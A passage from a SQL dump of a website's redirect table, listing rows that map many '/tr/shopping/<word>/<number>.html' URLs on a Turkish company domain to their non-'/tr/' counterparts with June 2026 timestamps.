00:00:00',301),(79483,'https://3s-technologies.com.tr/tr/shopping/americanus/2723157530.html',NULL,'https://3s-technologies.com.tr/shopping/americanus/2723157530.html','',1,0,'2026-06-11 22:46:38','0000-00-00 00:00:00',301),(79484,'https://3s-technologies.com.tr/tr/shopping/fanon/947690018.html',NULL,'https://3s-technologies.com.tr/shopping/fanon/947690018.html','',1,0,'2026-06-11 22:46:41','0000-00-00 00:00:00',301),(79485,'https://3s-technologies.com.tr/tr/shopping/cholecystis/3306797053.html',NULL,'https://3s-technologies.com.tr/shopping/cholecystis/3306797053.html','',1,0,'2026-06-11 22:46:44','0000-00-00 00:00:00',301),(79486,'https://3s-technologies.com.tr/tr/shopping/cubooctahedron/811192028.html',NULL,'https://3s-technologies.com.tr/shopping/cubooctahedron/811192028.html','',1,0,'2026-06-11 22:47:17','0000-00-00 00:00:00',301),(79487,'https://3s-technologies.com.tr/tr/shopping/galactophagist/948393480.html',NULL,'https://3s-technologies.com.tr/shopping/galactophagist/948393480.html','',1,0,'2026-06-11 22:47:19','0000-00-00 00:00:00',301),(79488,'https://3s-technologies.com.tr/tr/shopping/highlysexed/3273728507.html',NULL,'https://3s-technologies.com.tr/shopping/highlysexed/3273728507.html','',1,0,'2026-06-11 22:47:22','0000-00-00 00:00:00',301),(79489,'https://3s-technologies.com.tr/tr/shopping/mysteries/2661859985.html',NULL,'https://3s-technologies.com.tr/shopping/mysteries/2661859985.html','',1,0,'2026-06-11 22:47:25','0000-00-00 00:00:00',301),(79490,'https://3s-technologies.com.tr/tr/shopping/replantation/2625428913.html',NULL,'https://3s-technologies.com.tr/shopping/replantation/2625428913.html','',1,0,'2026-06-11 22:47:30','0000-00-00 00:00:00',301),(79491,'https://3s-technologies.com.tr/tr/shopping/muscarin/3180618182.html',NULL,'https://3s-technologies.com.tr/shopping/muscarin/3180618182.html','',1,0,'2026-06-11 22:47:32','0000-00-00 00:00:00',301),(79492,'https://3s-technologies.com.tr/tr/shopping/candellila/3833947991.html',NULL,'https://3s-technologies.com.tr/shopping/candellila/3833947991.html','',1,0,'2026-06-11 22:47:36','0000-00-00 00:00:00',301),(79493,'https://3s-technologies.com.tr/tr/shopping/anglophilic/1796462241.html',NULL,'https://3s-technologies.com.tr/shopping/anglophilic/1796462241.html','',1,0,'2026-06-11 22:48:09','0000-00-00 00:00:00',301),(79494,'https://3s-technologies.com.tr/tr/shopping/antiabortionist/2830535955.html',NULL,'https://3s-technologies.com.tr/shopping/antiabortionist/2830535955.html','',1,0,'2026-06-11 22:48:12','0000-00-00 00:00:00',301),(79495,'https://3s-technologies.com.tr/tr/shopping/eleutheropetalous/558519589.html',NULL,'https://3s-technologies.com.tr/shopping/eleutheropetalous/558519589.html','',1,0,'2026-06-11 22:48:15','0000-00-00 00:00:00',301),(79496,'https://3s-technologies.com.tr/tr/shopping/housewife/2862214732.html',NULL,'https://3s-technologies.com.tr/shopping/housewife/2862214732.html','',1,0,'2026-06-11 22:48:18','0000-00-00 00:00:00',301),(79497,'https://3s-technologies.com.tr/tr/shopping/energyreleasing/567860704.html',NULL,'https://3s-technologies.com.tr/shopping/energyreleasing/567860704.html','',1,0,'2026-06-11 22:48:46','0000-00-00 00:00:00',301),(79498,'https://3s-technologies.com.tr/tr/shopping/filipinos/1557252224.html',NULL,'https://3s-technologies.com.tr/shopping/filipinos/1557252224.html','',1,0,'2026-06-11 22:48:48','0000-00-00 00:00:00',301),(79499,'https://3s-technologies.com.tr/tr/shopping/peculiarity/1206233587.html',NULL,'https://3s-technologies.com.tr/shopping/peculiarity/1206233587.html','',1,0,'2026-06-11 22:48:52','0000-00-00 00:00:00',301),(79500,'https://3s-technologies.com.tr/tr/shopping/cumucirrostratus/1239290169.html',NULL,'https://3s-technologies.com.tr/shopping/cumucirrostratus/1239290169.html','',1,0,'2026-06-11 22:48:54','0000-00-00 00:00:00',301),(79501,'https://3s-technologies.com.tr/tr/shopping/cavorted/2773996402.html',NULL,'https://3s-technologies.com.tr/shopping/cavorted/2773996402.html','',1,0,'2026-06-11 22:49:00','0000-00-00 00:00:00',301),(79502,'https://3s-technologies.com.tr/tr/shopping/disculpating/1081526320.html',NULL,'https://3s-technologies.com.tr/shopping/disculpating/1081526320.html','',1,0,'2026-06-11 22:49:02','0000-00-00 00:00:00',301),(79503,'https://3s-technologies.com.tr/tr/shopping/augmenter/4293475812.html',NULL,'https://3s-technologies.com.tr/shopping/augmenter/4293475812.html','',1,0,'2026-06-11 22:49:05','0000-00-00 00:00:00',301),(79504,'https://3s-technologies.com.tr/tr/shopping/tenterhook/156351985.html',NULL,'https://3s-technologies.com.tr/shopping/tenterhook/156351985.html','',1,0,'2026-06-11 22:49:08','0000-00-00 00:00:00',301),(79505,'https://3s-technologies.com.tr/tr/shopping/existentialism/3531600491.html',NULL,'https://3s-technologies.com.tr/shopping/existentialism/3531600491.html','',1,0,'2026-06-11 22:49:11','0000-00-00 00:00:00',301),(79506,'https://3s-technologies.com.tr/tr/shopping/redditive/752608737.html',NULL,'https://3s-technologies.com.tr/shopping/redditive/752608737.html','',1,0,'2026-06-11 22:49:14','0000-00-00 00:00:00',301),(79507,'https://3s-technologies.com.tr/tr/shopping/selectness/616498484.html',NULL,'https://3s-technologies.com.tr/shopping/selectness/616498484.html','',1,0,'2026-06-11 22:49:17','0000-00-00 00:00:00',301),(79508,'https://3s-technologies.com.tr/tr/shopping/intercision/3885521049.html',NULL,'https://3s-technologies.com.tr/shopping/intercision/3885521049.html','',1,0,'2026-06-11 22:49:20','0000-00-00 00:00:00',301),(79509,'https://3s-technologies.com.tr/tr/shopping/dependingly/961885580.html',NULL,'https://3s-technologies.com.tr/shopping/dependingly/961885580.html','',1,0,'2026-06-11 22:49:23','0000-00-00 00:00:00',301),(79510,'https://3s-technologies.com.tr/tr/shopping/proscenium/3514245437.html',NULL,'https://3s-technologies.com.tr/shopping/proscenium/3514245437.html','',1,0,'2026-06-11 22:49:26','0000-00-00 00:00:00',301),(79511,'https://3s-technologies.com.tr/tr/shopping/springing/2389183836.html',NULL,'https://3s-technologies.com.tr/shopping/springing/2389183836.html','',1,0,'2026-06-11 22:49:29','0000-00-00 00:00:00',301),(79512,'https://3s-technologies.com.tr/tr/shopping/tonsorial/669798329.html',NULL,'https://3s-technologies.com.tr/shopping/tonsorial/669798329.html','',1,0,'2026-06-11 22:49:32','0000-00-00 00:00:00',301),(79513,'https://3s-technologies.com.tr/tr/shopping/compellative/915294243.html',NULL,'https://3s-technologies.com.tr/shopping/compellative/915294243.html','',1,0,'2026-06-11 22:49:36','0000-00-00 00:00:00',301),(79514,'https://3s-technologies.com.tr/tr/shopping/dilluing/1106403209.html',NULL,'https://3s-technologies.com.tr/shopping/dilluing/1106403209.html','',1,0,'2026-06-11 22:49:38','0000-00-00 00:00:00',301),(79515,'https://3s-technologies.com.tr/tr/shopping/vanquishable/1161794399.html',NULL,'https://3s-technologies.com.tr/shopping/vanquishable/1161794399.html','',1,0,'2026-06-11 22:49:41','0000-00-00 00:00:00',301),(79516,'https://3s-technologies.com.tr/tr/shopping/cavin/1756654480.html',NULL,'https://3s-technologies.com.tr/shopping/cavin/1756654480.html','',1,0,'2026-06-11 22:49:44','0000-00-00 00:00:00',301),(79517,'https://3s-technologies.com.tr/tr/shopping/perplexed/3673554270.html',NULL,'https://3s-technologies.com.tr/shopping/perplexed/3673554270.html','',1,0,'2026-06-11 22:49:47','0000-00-00 00:00:00',301),(79518,'https://3s-technologies.com.tr/tr/shopping/severing/900363403.html',NULL,'https://3s-technologies.com.tr/shopping/severing/900363403.html','',1,0,'2026-06-11 22:49:50','0000-00-00 00:00:00',301),(79519,'https://3s-technologies.com.tr/tr/shopping/hinging/2162203828.html',NULL,'https://3s-technologies.com.tr/shopping/hinging/2162203828.html','',1,0,'2026-06-11 22:49:54','0000-00-00 00:00:00',301),(79520,'https://3s-technologies.com.tr/tr/shopping/adscriptive/3070627555.html',NULL,'https://3s-technologies.com.tr/shopping/adscriptive/3070627555.html','',1,0,'2026-06-11 22:49:56','0000-00-00 00:00:00',301),(79521,'https://3s-technologies.com.tr/tr/shopping/cellularity/3267764097.html',NULL,'https://3s-technologies.com.tr/shopping/cellularity/3267764097.html','',1,0,'2026-06-11 22:49:59','0000-00-00 00:00:00',301),(79522,'https://3s-technologies.com.tr/tr/shopping/counterchecking/3709166192.html',NULL,'https://3s-technologies.com.tr/shopping/counterchecking/3709166192.html','',1,0,'2026-06-11 22:50:02','0000-00-00 00:00:00',301),(79523,'https://3s-technologies.com.tr/tr/shopping/thread/1664623857.html',NULL,'https://3s-technologies.com.tr/shopping/thread/1664623857.html','',1,0,'2026-06-11 22:50:05','0000-00-00 00:00:00',301),(79524,'https://3s-technologies.com.tr/tr/shopping/percolating/1098712028.html',NULL,'https://3s-technologies.com.tr/shopping/percolating/1098712028.html','',1,0,'2026-06-11 22:50:08','0000-00-00 00:00:00',301),(79525,'https://3s-technologies.com.tr/tr/shopping/cleanly/3054970897.html',NULL,'https://3s-technologies.com.tr/shopping/cleanly/3054970897.html','',1,0,'2026-06-11 22:50:11','0000-00-00 00:00:00',301),(79526,'https://3s-technologies.com.tr/tr/shopping/eudaemonistical/3032031893.html',NULL,'https://3s-technologies.com.tr/shopping/eudaemonistical/3032031893.html','',1,0,'2026-06-11 22:50:14','0000-00-00 00:00:00',301),(79527,'https://3s-technologies.com.tr/tr/shopping/intercolline/1907692284.html',NULL,'https://3s-technologies.com.tr/shopping/intercolline/1907692284.html','',1,0,'2026-06-11 22:50:17','0000-00-00 00:00:00',301),(79528,'https://3s-technologies.com.tr/tr/shopping/analogically/804060927.html',NULL,'https://3s-technologies.com.tr/shopping/analogically/804060927.html','',1,0,'2026-06-11 22:50:20','0000-00-00 00:00:00',301),(79529,'https://3s-technologies.com.tr/tr/shopping/systematizing/1519052565.html',NULL,'https://3s-technologies.com.tr/shopping/systematizing/1519052565.html','',1,0,'2026-06-11 22:50:23','0000-00-00 00:00:00',301),(79530,'https://3s-technologies.com.tr/tr/shopping/nitrification/1504121725.html',NULL,'https://3s-technologies.com.tr/shopping/nitrification/1504121725.html','',1,0,'2026-06-11 22:50:26','0000-00-00 00:00:00',301),(79531,'https://3s-technologies.com.tr/tr/shopping/multifariousness/1213201181.html',NULL,'https://3s-technologies.com.tr/shopping/multifariousness/1213201181.html','',1,0,'2026-06-11 22:50:30','0000-00-00 00:00:00',301),(79532,'https://3s-technologies.com.tr/tr/shopping/wintertide/39761392.html',NULL,'https://3s-technologies.com.tr/shopping/wintertide/39761392.html','',1,0,'2026-06-11 22:50:32','0000-00-00 00:00:00',301),(79533,'https://3s-technologies.com.tr/tr/shopping/manichord/3618828126.html',NULL,'https://3s-technologies.com.tr/shopping/manichord/3618828126.html','',1,0,'2026-06-11 22:50:35','0000-00-00 00:00:00',301),(79534,'https://3s-technologies.com.tr/tr/shopping/subact/3487821349.html',NULL,'https://3s-technologies.com.tr/shopping/subact/3487821349.html','',1,0,'2026-06-11 22:50:38','0000-00-00 00:00:00',301),(79535,'https://3s-technologies.com.tr/tr/shopping/isonandra/2043775188.html',NULL,'https://3s-technologies.com.tr/shopping/isonandra/2043775188.html','',1,0,'2026-06-11 22:50:41','0000-00-00 00:00:00',301),(79536,'https://3s-technologies.com.tr/tr/shopping/bergylt/2683481069.html',NULL,'https://3s-technologies.com.tr/shopping/bergylt/2683481069.html','',1,0,'2026-06-11 22:50:44','0000-00-00 00:00:00',301),(79537,'https://3s-technologies.com.tr/tr/shopping/encloud/3684939075.html',NULL,'https://3s-technologies.com.tr/shopping/encloud/3684939075.html','',1,0,'2026-06-11 22:50:48','0000-00-00 00:00:00',301),(79538,'https://3s-technologies.com.tr/tr/shopping/newfangle/1906573720.html',NULL,'https://3s-technologies.com.tr/shopping/newfangle/1906573720.html','',1,0,'2026-06-11 22:50:50','0000-00-00 00:00:00',301),(79539,'https://3s-technologies.com.tr/tr/shopping/reckoner/2825947183.html',NULL,'https://3s-technologies.com.tr/shopping/reckoner/2825947183.html','',1,0,'2026-06-11 22:50:53','0000-00-00 00:00:00',301),(79540,'https://3s-technologies.com.tr/tr/shopping/please/1846052528.html',NULL,'https://3s-technologies.com.tr/shopping/please/1846052528.html','',1,0,'2026-06-11 22:50:56','0000-00-00 00:00:00',301),(79541,'https://3s-technologies.com.tr/tr/shopping/emplumed/4000554201.html',NULL,'https://3s-technologies.com.tr/shopping/emplumed/4000554201.html','',1,0,'2026-06-11 22:50:59','0000-00-00 00:00:00',301),(79542,'https://3s-technologies.com.tr/tr/shopping/commode/3951494904.html',NULL,'https://3s-technologies.com.tr/shopping/commode/3951494904.html','',1,0,'2026-06-11 22:51:02','0000-00-00 00:00:00',301),(79543,'https://3s-technologies.com.tr/tr/shopping/aboard/67270711.html',NULL,'https://3s-technologies.com.tr/shopping/aboard/67270711.html','',1,0,'2026-06-11 22:51:05','0000-00-00 00:00:00',301),(79544,'https://3s-technologies.com.tr/tr/shopping/sensorium/3918362384.html',NULL,'https://3s-technologies.com.tr/shopping/sensorium/3918362384.html','',1,0,'2026-06-11 22:51:08','0000-00-00 00:00:00',301),(79545,'https://3s-technologies.com.tr/tr/shopping/prosternation/2974197385.html',NULL,'https://3s-technologies.com.tr/shopping/prosternation/2974197385.html','',1,0,'2026-06-11 22:51:16','0000-00-00 00:00:00',301),(79546,'https://3s-technologies.com.tr/tr/shopping/hypermetropia/1059816623.html',NULL,'https://3s-technologies.com.tr/shopping/hypermetropia/1059816623.html','',1,0,'2026-06-11 22:51:17','0000-00-00 00:00:00',301),(79547,'https://3s-technologies.com.tr/tr/shopping/pompillion/736217204.html',NULL,'https://3s-technologies.com.tr/shopping/pompillion/736217204.html','',1,0,'2026-06-11 22:51:21','0000-00-00 00:00:00',301),(79548,'https://3s-technologies.com.tr/tr/shopping/androspore/783456237.html',NULL,'https://3s-technologies.com.tr/shopping/androspore/783456237.html','',1,0,'2026-06-11 22:51:23','0000-00-00 00:00:00',301),(79549,'https://3s-technologies.com.tr/tr/shopping/disembarrass/2809740238.html',NULL,'https://3s-technologies.com.tr/shopping/disembarrass/2809740238.html','',1,0,'2026-06-11 22:51:27','0000-00-00 00:00:00',301),(79550,'https://3s-technologies.com.tr/tr/shopping/keloid/1112947103.html',NULL,'https://3s-technologies.com.tr/shopping/keloid/1112947103.html','',1,0,'2026-06-11 22:51:29','0000-00-00 00:00:00',301),(79551,'https://3s-technologies.com.tr/tr/shopping/condemned/1565595205.html',NULL,'https://3s-technologies.com.tr/shopping/condemned/1565595205.html','',1,0,'2026-06-11 22:51:32','0000-00-00 00:00:00',301),(79552,'https://3s-technologies.com.tr/tr/shopping/vainly/653282367.html',NULL,'https://3s-technologies.com.tr/shopping/vainly/653282367.html','',1,0,'2026-06-11 22:51:36','0000-00-00 00:00:00',301),(79553,'https://3s-technologies.com.tr/tr/shopping/bewash/2898558657.html',NULL,'https://3s-technologies.com.tr/shopping/bewash/2898558657.html','',1,0,'2026-06-11 22:51:39','0000-00-00 00:00:00',301),(79554,'https://3s-technologies.com.tr/tr/shopping/accidental/707613423.html',NULL,'https://3s-technologies.com.tr/shopping/accidental/707613423.html','',1,0,'2026-06-11 22:51:41','0000-00-00 00:00:00',301),(79555,'https://3s-technologies.com.tr/tr/shopping/epialtus/758452263.html',NULL,'https://3s-technologies.com.tr/shopping/epialtus/758452263.html','',1,0,'2026-06-11 22:51:47','0000-00-00 00:00:00',301),(79556,'https://3s-technologies.com.tr/tr/shopping/hyosternal/2525317576.html',NULL,'https://3s-technologies.com.tr/shopping/hyosternal/2525317576.html','',1,0,'2026-06-11 22:51:49','0000-00-00 00:00:00',301),(79557,'https://3s-technologies.com.tr/tr/shopping/harrower/414704427.html',NULL,'https://3s-technologies.com.tr/shopping/harrower/414704427.html','',1,0,'2026-06-11 22:51:51','0000-00-00 00:00:00',301),(79558,'https://3s-technologies.com.tr/tr/shopping/confiscatory/644017235.html',NULL,'https://3s-technologies.com.tr/shopping/confiscatory/644017235.html','',1,0,'2026-06-11 22:51:54','0000-00-00 00:00:00',301),(79559,'https://3s-technologies.com.tr/tr/shopping/ruperts/815487384.html',NULL,'https://3s-technologies.com.tr/shopping/ruperts/815487384.html','',1,0,'2026-06-11 22:51:58','0000-00-00 00:00:00',301),(79560,'https://3s-technologies.com.tr/tr/shopping/accrescent/964454149.html',NULL,'https://3s-technologies.com.tr/shopping/accrescent/964454149.html','',1,0,'2026-06-11 22:52:01','0000-00-00 00:00:00',301),(79561,'https://3s-technologies.com.tr/tr/shopping/sedation/371196379.html',NULL,'https://3s-technologies.com.tr/shopping/sedation/371196379.html','',1,0,'2026-06-11 22:52:04','0000-00-00 00:00:00',301),(79562,'https://3s-technologies.com.tr/tr/shopping/zoophaga/1965048167.html',NULL,'https://3s-technologies.com.tr/shopping/zoophaga/1965048167.html','',1,0,'2026-06-11 22:52:07','0000-00-00 00:00:00',301),(79563,'https://3s-technologies.com.tr/tr/shopping/outfly/662929746.html',NULL,'https://3s-technologies.com.tr/shopping/outfly/662929746.html','',1,0,'2026-06-11 22:52:10','0000-00-00 00:00:00',301),(79564,'https://3s-technologies.com.tr/tr/shopping/filtered/3582892606.html',NULL,'https://3s-technologies.com.tr/shopping/filtered/3582892606.html','',1,0,'2026-06-11 22:52:13','0000-00-00 00:00:00',301),(79565,'https://3s-technologies.com.tr/tr/shopping/tensity/2288001355.html',NULL,'https://3s-technologies.com.tr/shopping/tensity/2288001355.html','',1,0,'2026-06-11 22:52:16','0000-00-00 00:00:00',301),(79566,'https://3s-technologies.com.tr/tr/shopping/brassvisaged/349252521.html',NULL,'https://3s-technologies.com.tr/shopping/brassvisaged/349252521.html','',1,0,'2026-06-11 22:52:19','0000-00-00 00:00:00',301),(79567,'https://3s-technologies.com.tr/tr/shopping/rurally/1930388752.html',NULL,'https://3s-technologies.com.tr/shopping/rurally/1930388752.html','',1,0,'2026-06-11 22:52:22','0000-00-00 00:00:00',301),(79568,'https://3s-technologies.com.tr/tr/shopping/improsperousness/1513776557.html',NULL,'https://3s-technologies.com.tr/shopping/improsperousness/1513776557.html','',1,0,'2026-06-11 22:52:25','0000-00-00 00:00:00',301),(79569,'https://3s-technologies.com.tr/tr/shopping/elytron/403204385.html',NULL,'https://3s-technologies.com.tr/shopping/elytron/403204385.html','',1,0,'2026-06-11 22:52:28','0000-00-00 00:00:00',301),(79570,'https://3s-technologies.com.tr/tr/shopping/amble/1296716040.html',NULL,'https://3s-technologies.com.tr/shopping/amble/1296716040.html','',1,0,'2026-06-11 22:52:31','0000-00-00 00:00:00',301),(79571,'https://3s-technologies.com.tr/tr/shopping/fleece/1872141532.html',NULL,'https://3s-technologies.com.tr/shopping/fleece/1872141532.html','',1,0,'2026-06-11 22:52:34','0000-00-00 00:00:00',301),(79572,'https://3s-technologies.com.tr/tr/shopping/yeldrin/1949247122.html',NULL,'https://3s-technologies.com.tr/shopping/yeldrin/1949247122.html','',1,0,'2026-06-11 22:52:37','0000-00-00 00:00:00',301),(79573,'https://3s-technologies.com.tr/tr/shopping/conceivable/1999771588.html',NULL,'https://3s-technologies.com.tr/shopping/conceivable/1999771588.html','',1,0,'2026-06-11 22:52:40','0000-00-00 00:00:00',301),(79574,'https://3s-technologies.com.tr/tr/shopping/hemicycle/2400568657.html',NULL,'https://3s-technologies.com.tr/shopping/hemicycle/2400568657.html','',1,0,'2026-06-11 22:52:43','0000-00-00 00:00:00',301),(79575,'https://3s-technologies.com.tr/tr/shopping/congenite/377160773.html',NULL,'https://3s-technologies.com.tr/shopping/congenite/377160773.html','',1,0,'2026-06-11 22:52:46','0000-00-00 00:00:00',301),(79576,'https://3s-technologies.com.tr/tr/shopping/axmen/759404770.html',NULL,'https://3s-technologies.com.tr/shopping/axmen/759404770.html','',1,0,'2026-06-11 22:52:49','0000-00-00 00:00:00',301),(79577,'https://3s-technologies.com.tr/tr/shopping/crapulent/1145584701.html',NULL,'https://3s-technologies.com.tr/shopping/crapulent/1145584701.html','',1,0,'2026-06-11 22:52:52','0000-00-00 00:00:00',301),(79578,'https://3s-technologies.com.tr/tr/shopping/conduced/1714522038.html',NULL,'https://3s-technologies.com.tr/shopping/conduced/1714522038.html','',1,0,'2026-06-11 22:52:55','0000-00-00 00:00:00',301),(79579,'https://3s-technologies.com.tr/tr/shopping/overcover/609485498.html',NULL,'https://3s-technologies.com.tr/shopping/overcover/609485498.html','',1,0,'2026-06-11 22:53:01','0000-00-00 00:00:00',301),(79580,'https://3s-technologies.com.tr/tr/shopping/chauna/2224218487.html',NULL,'https://3s-technologies.com.tr/shopping/chauna/2224218487.html','',1,0,'2026-06-11 22:53:04','0000-00-00 00:00:00',301),(79581,'https://3s-technologies.com.tr/tr/shopping/ardetta/1451729517.html',NULL,'https://3s-technologies.com.tr/shopping/ardetta/1451729517.html','',1,0,'2026-06-11 22:53:07','0000-00-00 00:00:00',301),(79582,'https://3s-technologies.com.tr/tr/shopping/defending/2235555022.html',NULL,'https://3s-technologies.com.tr/shopping/defending/2235555022.html','',1,0,'2026-06-11 22:53:10','0000-00-00 00:00:00',301),(79583,'https://3s-technologies.com.tr/tr/shopping/plumy/534780267.html',NULL,'https://3s-technologies.com.tr/shopping/plumy/534780267.html','',1,0,'2026-06-11 22:53:13','0000-00-00 00:00:00',301),(79584,'https://3s-technologies.com.tr/tr/shopping/mahon/1719798078.html',NULL,'https://3s-technologies.com.tr/shopping/mahon/1719798078.html','',1,0,'2026-06-11 22:53:16','0000-00-00 00:00:00',301),(79585,'https://3s-technologies.com.tr/tr/shopping/clocklike/2446996439.html',NULL,'https://3s-technologies.com.tr/shopping/clocklike/2446996439.html','',1,0,'2026-06-11 22:53:19','0000-00-00 00:00:00',301),(79586,'https://3s-technologies.com.tr/tr/shopping/traducement/594263441.html',NULL,'https://3s-technologies.com.tr/shopping/traducement/594263441.html','',1,0,'2026-06-11 22:53:22','0000-00-00 00:00:00',301),(79587,'https://3s-technologies.com.tr/tr/shopping/colobus/3344655487.html',NULL,'https://3s-technologies.com.tr/shopping/colobus/3344655487.html','',1,0,'2026-06-11 22:53:25','0000-00-00 00:00:00',301),(79588,'https://3s-technologies.com.tr/tr/shopping/virger/599015736.html',NULL,'https://3s-technologies.com.tr/shopping/virger/599015736.html','',1,0,'2026-06-11 22:53:28','0000-00-00 00:00:00',301),(79589,'https://3s-technologies.com.tr/tr/shopping/dismasting/615286401.html',NULL,'https://3s-technologies.com.tr/shopping/dismasting/615286401.html','',1,0,'2026-06-11 22:53:31','0000-00-00 00:00:00',301),(79590,'https://3s-technologies.com.tr/tr/shopping/biscacha/4229622785.html',NULL,'https://3s-technologies.com.tr/shopping/biscacha/4229622785.html','',1,0,'2026-06-11 22:53:35','0000-00-00 00:00:00',301),(79591,'https://3s-technologies.com.tr/tr/shopping/passionless/1614700701.html',NULL,'https://3s-technologies.com.tr/shopping/passionless/1614700701.html','',1,0,'2026-06-11 22:53:38','0000-00-00 00:00:00',301),(79592,'https://3s-technologies.com.tr/tr/shopping/diagnoses/3483497816.html',NULL,'https://3s-technologies.com.tr/shopping/diagnoses/3483497816.html','',1,0,'2026-06-11 22:53:42','0000-00-00 00:00:00',301),(79593,'https://3s-technologies.com.tr/tr/shopping/manograph/1837581634.html',NULL,'https://3s-technologies.com.tr/shopping/manograph/1837581634.html','',1,0,'2026-06-11 22:53:47','0000-00-00 00:00:00',301),(79594,'https://3s-technologies.com.tr/tr/shopping/campaign/793936507.html',NULL,'https://3s-technologies.com.tr/shopping/campaign/793936507.html','',1,0,'2026-06-11 22:53:50','0000-00-00 00:00:00',301),(79595,'https://3s-technologies.com.tr/tr/shopping/sustenance/1850347900.html',NULL,'https://3s-technologies.com.tr/shopping/sustenance/1850347900.html','',1,0,'2026-06-11 22:53:53','0000-00-00 00:00:00',301),(79596,'https://3s-technologies.com.tr/tr/shopping/allect/3418895452.html',NULL,'https://3s-technologies.com.tr/shopping/allect/3418895452.html','',1,0,'2026-06-11 22:53:56','0000-00-00 00:00:00',301),(79597,'https://3s-technologies.com.tr/tr/shopping/chose/1966423805.html',NULL,'https://3s-technologies.com.tr/shopping/chose/1966423805.html','',1,0,'2026-06-11 22:53:59','0000-00-00 00:00:00',301),(79598,'https://3s-technologies.com.tr/tr/shopping/insanability/151744061.html',NULL,'https://3s-technologies.com.tr/shopping/insanability/151744061.html','',1,0,'2026-06-11 22:54:02','0000-00-00 00:00:00',301),(79599,'https://3s-technologies.com.tr/tr/shopping/counteraction/2557421667.html',NULL,'https://3s-technologies.com.tr/shopping/counteraction/2557421667.html','',1,0,'2026-06-11 22:54:05','0000-00-00 00:00:00',301),(79600,'https://3s-technologies.com.tr/tr/shopping/trehala/17654027.html',NULL,'https://3s-technologies.com.tr/shopping/trehala/17654027.html','',1,0,'2026-06-11 22:54:08','0000-00-00 00:00:00',301),(79601,'https://3s-technologies.com.tr/tr/shopping/inscribing/4111333796.html',NULL,'https://3s-technologies.com.tr/shopping/inscribing/4111333796.html','',1,0,'2026-06-11 22:54:13','0000-00-00 00:00:00',301),(79602,'https://3s-technologies.com.tr/tr/shopping/hallucination/142172649.html',NULL,'https://3s-technologies.com.tr/shopping/hallucination/142172649.html','',1,0,'2026-06-11 22:54:15','0000-00-00 00:00:00',301),(79603,'https://3s-technologies.com.tr/tr/shopping/accolade/2905921830.html',NULL,'https://3s-technologies.com.tr/shopping/accolade/2905921830.html','',1,0,'2026-06-11 22:54:17','0000-00-00 00:00:00',301),(79604,'https://3s-technologies.com.tr/tr/shopping/manicotti/904831323.html',NULL,'https://3s-technologies.com.tr/shopping/manicotti/904831323.html','',1,0,'2026-06-11 22:54:20','0000-00-00 00:00:00',301),(79605,'https://3s-technologies.com.tr/tr/shopping/northwardly/209722956.html',NULL,'https://3s-technologies.com.tr/shopping/northwardly/209722956.html','',1,0,'2026-06-11 22:54:23','0000-00-00 00:00:00',301),(79606,'https://3s-technologies.com.tr/tr/shopping/affined/2732848848.html',NULL,'https://3s-technologies.com.tr/shopping/affined/2732848848.html','',1,0,'2026-06-11 22:54:26','0000-00-00 00:00:00',301),(79607,'https://3s-technologies.com.tr/tr/shopping/shroving/2946941690.html',NULL,'https://3s-technologies.com.tr/shopping/shroving/2946941690.html','',1,0,'2026-06-11 22:54:29','0000-00-00 00:00:00',301),(79608,'https://3s-technologies.com.tr/tr/shopping/melezitose/3424089174.html',NULL,'https://3s-technologies.com.tr/shopping/melezitose/3424089174.html','',1,0,'2026-06-11 22:54:32','0000-00-00 00:00:00',301),(79609,'https://3s-technologies.com.tr/tr/shopping/infraction/2121437266.html',NULL,'https://3s-technologies.com.tr/shopping/infraction/2121437266.html','',1,0,'2026-06-11 22:54:35','0000-00-00 00:00:00',301),(79610,'https://3s-technologies.com.tr/tr/shopping/billyo/1052144562.html',NULL,'https://3s-technologies.com.tr/shopping/billyo/1052144562.html','',1,0,'2026-06-11 22:54:38','0000-00-00 00:00:00',301),(79611,'https://3s-technologies.com.tr/tr/shopping/reticence/85633080.html',NULL,'https://3s-technologies.com.tr/shopping/reticence/85633080.html','',1,0,'2026-06-11 22:54:41','0000-00-00 00:00:00',301),(79612,'https://3s-technologies.com.tr/tr/shopping/epicene/2258778401.html',NULL,'https://3s-technologies.com.tr/shopping/epicene/2258778401.html','',1,0,'2026-06-11 22:54:44','0000-00-00 00:00:00',301),(79613,'https://3s-technologies.com.tr/tr/shopping/endoscope/3930295321.html',NULL,'https://3s-technologies.com.tr/shopping/endoscope/3930295321.html','',1,0,'2026-06-11 22:54:47','0000-00-00 00:00:00',301),(79614,'https://3s-technologies.com.tr/tr/shopping/felicitousness/353841325.html',NULL,'https://3s-technologies.com.tr/shopping/felicitousness/353841325.html','',1,0,'2026-06-11 22:54:50','0000-00-00 00:00:00',301),(79615,'https://3s-technologies.com.tr/tr/shopping/lutulent/1968323124.html',NULL,'https://3s-technologies.com.tr/shopping/lutulent/1968323124.html','',1,0,'2026-06-11 22:54:53','0000-00-00 00:00:00',301),(79616,'https://3s-technologies.com.tr/tr/shopping/coachbox/300710810.html',NULL,'https://3s-technologies.com.tr/shopping/coachbox/300710810.html','',1,0,'2026-06-11 22:54:58','0000-00-00 00:00:00',301),(79617,'https://3s-technologies.com.tr/tr/shopping/bunsen/2296130339.html',NULL,'https://3s-technologies.com.tr/shopping/bunsen/2296130339.html','',1,0,'2026-06-11 22:55:01','0000-00-00 00:00:00',301),(79618,'https://3s-technologies.com.tr/tr/shopping/knackkneed/1004261910.html',NULL,'https://3s-technologies.com.tr/shopping/knackkneed/1004261910.html','',1,0,'2026-06-11 22:55:04','0000-00-00 00:00:00',301),(79619,'https://3s-technologies.com.tr/tr/shopping/chicken/2642442057.html',NULL,'https://3s-technologies.com.tr/shopping/chicken/2642442057.html','',1,0,'2026-06-11 22:55:07','0000-00-00 00:00:00',301),(79620,'https://3s-technologies.com.tr/tr/shopping/sicle/1427457546.html',NULL,'https://3s-technologies.com.tr/shopping/sicle/1427457546.html','',1,0,'2026-06-11 22:55:10','0000-00-00 00:00:00',301),(79621,'https://3s-technologies.com.tr/tr/shopping/quilted/1885992203.html',NULL,'https://3s-technologies.com.tr/shopping/quilted/1885992203.html','',1,0,'2026-06-11 22:55:13','0000-00-00 00:00:00',301),(79622,'https://3s-technologies.com.tr/tr/shopping/snuggeries/2175840315.html',NULL,'https://3s-technologies.com.tr/shopping/snuggeries/2175840315.html','',1,0,'2026-06-11 22:55:16','0000-00-00 00:00:00',301),(79623,'https://3s-technologies.com.tr/tr/shopping/mendicancy/2133432860.html',NULL,'https://3s-technologies.com.tr/shopping/mendicancy/2133432860.html','',1,0,'2026-06-11 22:55:19','0000-00-00 